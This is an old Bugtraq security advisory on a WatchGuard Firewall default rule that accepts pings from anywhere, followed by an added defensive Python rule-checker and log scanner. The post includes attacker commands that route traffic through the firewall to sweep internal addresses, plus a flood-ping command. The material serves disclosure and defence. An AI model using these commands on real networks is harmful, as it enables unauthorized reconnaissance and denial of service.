Date: Thu, 2 Sep 1999 13:15:36 +0200
From: Alfonso Lazaro <altellez@IP6SEGURIDAD.COM>
Subject: Default configuration in WatchGuard Firewall
To: BUGTRAQ@SECURITYFOCUS.COM

I have found a misconfiguration in the default configuration of WatchGuard Firewall. By default it appends a rule that accepts pings from any to any.

So if our Firebox is defending our internal network (192.168.x.x ...) and our WG Firewall is a proxy with an external IP on the Internet (100.100.100.100, hypothetical IP address), the attacker can change his/her routes like so:

    # route add -net 192.168.0.0 netmask 255.255.255.0 gw 100.100.100.100
    # ping 192.168.1.1
    PING 192.168.1.1 (192.168.1.1): 56 data bytes
    64 bytes from 192.168.1.1: icmp_seq=0 ttl=251 time=514.0 ms
    ^C
    # ping 192.168.1.2
    PING 192.168.1.2 (192.168.1.2): 56 data bytes
    64 bytes from 192.168.1.2: icmp_seq=0 ttl=251 time=523.0 ms
    ^C

and so on ... the attacker can now discover internal network IPs and attack them:

    # ping -f 192.168.1.1

Solution is easy ... do not let pings to the internal network.

--
Regards.
===========================================================
Alfonso Lazaro Tellez           altellez@ip6seguridad.com
Security analyst                IP6Seguridad
http://www.ip6seguridad.com     Tel: +34 91-3430245
C\Alberto Alcocer 5, 1 D        Fax: +34 91-3430294
Madrid ( SPAIN )
===========================================================
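An added example from the defender's side, not part of the original post or of any WatchGuard product: it evaluates an ordered rule list (first match wins, implicit deny) to show why the default "any to any" ICMP rule lets an outside echo request reach an RFC 1918 address and how a preceding "deny to internal" rule fixes it, and it flags relayed pings in constructed log lines. The log format, the interface name "ext", the rule field names and all addresses are assumptions for the example.

```python
import ipaddress

PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EXTERNAL_IFACE = "ext"  # assumed name of the Internet-facing interface


def is_internal(addr: str) -> bool:
    """True if addr lies in an RFC 1918 range (the 192.168.x.x network of the post)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in PRIVATE_NETS)


def matches(field: str, addr: str) -> bool:
    """Rule endpoint fields are 'any', 'internal', or a CIDR/host string (assumed syntax)."""
    if field == "any":
        return True
    if field == "internal":
        return is_internal(addr)
    return ipaddress.ip_address(addr) in ipaddress.ip_network(field, strict=False)


def ping_to_internal_allowed(rules, src="203.0.113.7", dst="192.168.1.1") -> bool:
    """First-match evaluation of an ICMP echo from an outside host to an internal
    address. Returns True when the rule set would forward it, False on implicit deny."""
    for r in rules:
        if r["proto"] in ("any", "icmp") and matches(r["src"], src) and matches(r["dst"], dst):
            return r["action"] == "allow"
    return False


def find_transit_pings(log_text: str):
    """Return (src, dst) for accepted echo-requests that arrived on the external
    interface from a non-private source with a private destination: a ping that
    was relayed through the firewall into the internal network."""
    hits = []
    for line in log_text.splitlines():
        iface, src, dst, proto, kind, action = line.split()
        if (iface == EXTERNAL_IFACE and proto == "icmp" and kind == "echo-request"
                and action == "allow" and is_internal(dst) and not is_internal(src)):
            hits.append((src, dst))
    return hits


# The default described in the post, and the fix: deny pings to the internal network first.
DEFAULT_RULES = [{"src": "any", "dst": "any", "proto": "icmp", "action": "allow"}]
FIXED_RULES = [{"src": "any", "dst": "internal", "proto": "icmp", "action": "deny"}] + DEFAULT_RULES

# Constructed log lines (hypothetical format: iface src dst proto type action).
SAMPLE_LOG = """\
ext 203.0.113.7 192.168.1.1 icmp echo-request allow
ext 203.0.113.7 192.168.1.2 icmp echo-request allow
ext 203.0.113.7 100.100.100.100 icmp echo-request allow
int 192.168.1.10 192.168.1.1 icmp echo-request allow
ext 203.0.113.9 192.168.1.1 tcp syn deny"""
```

Two or more hits from one source against consecutive internal addresses is the sweep pattern the post describes; a ping to the firewall's own external address is not flagged.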